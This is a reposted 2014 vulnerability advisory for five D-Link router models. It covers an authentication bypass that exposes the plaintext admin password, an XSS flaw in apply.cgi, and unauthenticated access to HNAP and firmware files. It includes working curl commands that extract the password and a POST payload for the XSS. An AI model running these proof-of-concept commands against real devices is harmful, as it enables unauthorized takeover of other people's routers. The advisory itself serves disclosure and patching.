Bài liên quan
The following five D-Link model routers suffer from severalvulnerabilities including Clear Text Storage of Passwords, Cross SiteScripting and Sensitive Information Disclosure.DIR-652D-Link Wireless N Gigabit Home RouterDIR-835D-Link Network DIR-835L Wireless N 750M Dual-band 802.11n 4Port Gigabit RouterDIR-855L -D-Link Wireless N900 Dual Band Gigabit RouterDGL-5500D-Link AC1300 Gaming RouterDHP-1565D-Link Wireless N PowerLine Gigabit RouterAffected firmware - FW 1.02b18/1.12b02 or olderAccess - RemoteComplexity - LowAuthentication - NoneImpact - Full loss of confidentiality-------------------------------------------------------------------------------------------------------------Clear Text Password - CWE - CWE-316: Cleartext Storage of Sensitive InformationAuthentication can be bypassed to gain access to the filetools_admin.asp, which stores the devices admin password in plaintext, by adding a "/" to the end of the URL.Proof of Concept for the DGL-5500, DIR-855L and the DIR-835:curl -s http://<IP>/tools_admin.asp/ |awk '/hidden/ &&/admin_password_tmp/ && /value/ {print $5}'PoC for the DHP-1565 and DIR-652, the generic 'user' must be added.curl -s http://<IP>/tools_admin.asp/ -u user:|awk '/hidden/ &&/admin_password_tmp/ && /value/ {print $5}'-------------------------------------------------------------------------------------------------------------Cross Site Scripting - CWE - CWE-79: Improper Neutralization of UserInput / ReturnFor the file "apply.cgi" ("apply_sec.cgi" on the DGL-5500) the POSTparam "action" suffers from a XSS vulnerability due to improperneutralization of user input / return output.PoC for DIR-855L, DIR-835, DHP-1565http://<IP>/apply.cgiPOSTgraph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3DHTTP/1.1For the DGL-5500http://<IP>/apply_sec.cgiPOSTgraph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3DHTTP/1.1-------------------------------------------------------------------------------------------------------------Sensitive Information Disclosure - CWE - CWE-200: Information ExposureThe D-Link models DGL-5500, DIR-855L, DIR-835 suffer from avulnerability which an unauthenticated person can gain access thesensitive files:http://<IP>:8080/hnap.cgi and /HNAP1/ via:curl -s curl -s http://<IP>:8080/HNAP1/On the DIR-652 and DHP-1565, a user needs authentication first togain access to these files.But more importantly, an unauthenticated user can browse directly tohttp://<IP>/cgi/ssi/ which will offer a download of the device's ELFMBS MIPS file. The file contains most of the devices internal workingstructure and sensitive information. These particular routers use aMSB EM_MIPS Processor and it does contain executable components.The file can be accessed through at least one known cgi file, howeverthere maybe others. Although no known publicly working example existto my knowledge, unpatched devices are susceptible to injection ofmalicious code and most likely susceptible to a payload which coulddeploy a self-replicating worm.-------------------------------------------------------------------------------------------------------------These items were reported to D-Link on April 20th, and to US Cert onApril 21. D-Link does have patches available for all affected models,and it is highly recommended to update the device's firmware as soonas possible.Vendor Links:http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10025http://securityadvisories.dlink.com/security/Research Contact - Kyle LovettMay 21, 2014
Post a Comment